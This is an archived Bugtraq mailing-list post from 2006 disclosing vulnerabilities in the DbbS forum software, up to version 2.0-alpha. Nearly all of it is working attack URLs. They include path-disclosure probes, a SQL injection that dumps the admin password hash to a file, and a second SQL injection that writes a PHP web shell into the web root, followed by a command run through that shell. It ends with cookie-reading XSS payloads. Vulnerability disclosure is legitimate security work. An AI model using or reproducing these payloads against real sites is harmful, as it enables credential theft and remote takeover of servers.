[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
DbbS<=2.0-alpha Multiple Vulnerabilities
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: DbbS<=2.0-alpha Multiple Vulnerabilities
- From: yamcho@xxxxxxx
- Date: 16 Apr 2006 03:46:38 -0000
Special thanks to rgod for his help!!!
Full path disclosure
http://www.site.com/DbbS/topics.php?fcategoryid='
http://www.site.com/DbbS/script.php?unavariabile[]=
http://www.site.com/DbbS/script.php?GLOBALS[]=
http://www.site.com/DbbS/script.php?_SERVER[]=
MD5 Password
http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\test.txt'%20FROM%20forum_membres%20WHERE%20id='1'/*
Create shell
http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,'<?php%20passthru($_GET[cmd]);?>'%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\suntzu.php'%20FROM%20forum_categories/*
Launch a command
http://www.site.com/DbbS/suntzu.php?cmd=dir
XSS
http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation=";><script>alert(document.cookie)</script>
http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies=";><script>alert(document.cookie)</script>
by rgod and yamcho